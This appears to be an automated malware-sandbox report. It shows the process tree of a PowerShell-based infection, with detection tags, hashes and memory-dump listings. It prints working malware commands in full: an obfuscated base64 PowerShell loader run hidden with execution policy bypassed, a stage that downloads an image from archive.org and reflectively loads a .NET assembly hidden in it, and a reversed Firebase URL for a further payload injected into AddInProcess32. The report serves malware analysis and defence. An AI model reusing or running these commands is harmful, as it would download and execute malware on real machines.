´Bl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bp䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bg䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´eQBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBM䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´QQBz䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBi䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBP䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´S䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´Ec䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´E0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBW䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´SQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBv䷡ ㌝ ₋ ⊩ ´Gs䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´bgB1䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´WwBv䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´F0䷡ ㌝ ₋ ⊩ ´XQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBj䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´DU䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´1䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´Dg䷡ ㌝ ₋ ⊩ ´LQBm䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´C0䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´Dc䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Dk䷡ ㌝ ₋ ⊩ ´MwBi䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZQBr䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´m䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´aQBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQ䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´D8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´NQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´cgBv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YgBp䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´LwBt䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´bwBw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´DI䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´cgBj䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´dg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´cwBp䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´YQBl䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´ZwBv䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´ZwBh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBz䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´YgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBm䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Lw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Qw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´U䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´ZwBy䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bQBE䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cwBv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bk䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBQ䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´JwBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´aQB2䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('䷡ ㌝ ₋ ⊩ ´','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1292
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('cc8b59e3256f-a768-fbb4-9e70-d8e93bf2=nekot&aidem=tla?txt.1042028050mrowxyobihc/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'incurioso','AddInProcess32','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:872
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\incurioso.js"
          4⤵
            PID:4388
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:1164
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
                PID:4508
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:4896
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1724
                  5⤵
                  • Program crash
                  PID:812
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4896 -ip 4896
          1⤵
            PID:4800

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            f41839a3fe2888c8b3050197bc9a0a05

            SHA1

            0798941aaf7a53a11ea9ed589752890aee069729

            SHA256

            224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

            SHA512

            2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            d8b9a260789a22d72263ef3bb119108c

            SHA1

            376a9bd48726f422679f2cd65003442c0b6f6dd5

            SHA256

            d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

            SHA512

            550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gptp10ah.hoh.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • memory/872-22-0x0000029E6E5F0000-0x0000029E6E712000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/1292-12-0x00007FFA47BD0000-0x00007FFA48691000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1292-30-0x00007FFA47BD0000-0x00007FFA48691000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1292-0-0x00007FFA47BD3000-0x00007FFA47BD5000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1292-11-0x00007FFA47BD0000-0x00007FFA48691000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1292-1-0x000002705E210000-0x000002705E232000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4896-32-0x0000000005CD0000-0x0000000006274000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/4896-31-0x00000000052C0000-0x000000000535C000-memory.dmp

            Filesize

            624KB

            Download

          • memory/4896-24-0x0000000000400000-0x0000000000410000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4896-33-0x0000000006280000-0x0000000006312000-memory.dmp

            Filesize

            584KB

            Download

          • memory/4896-34-0x0000000005C60000-0x0000000005C6A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4896-35-0x00000000064E0000-0x0000000006546000-memory.dmp

            Filesize

            408KB

            Download

          • memory/4896-36-0x0000000006F10000-0x000000000702E000-memory.dmp

            Filesize

            1.1MB

            Download

          • memory/4896-37-0x0000000007050000-0x00000000073A4000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/4896-38-0x0000000007540000-0x000000000758C000-memory.dmp

            Filesize

            304KB

            Download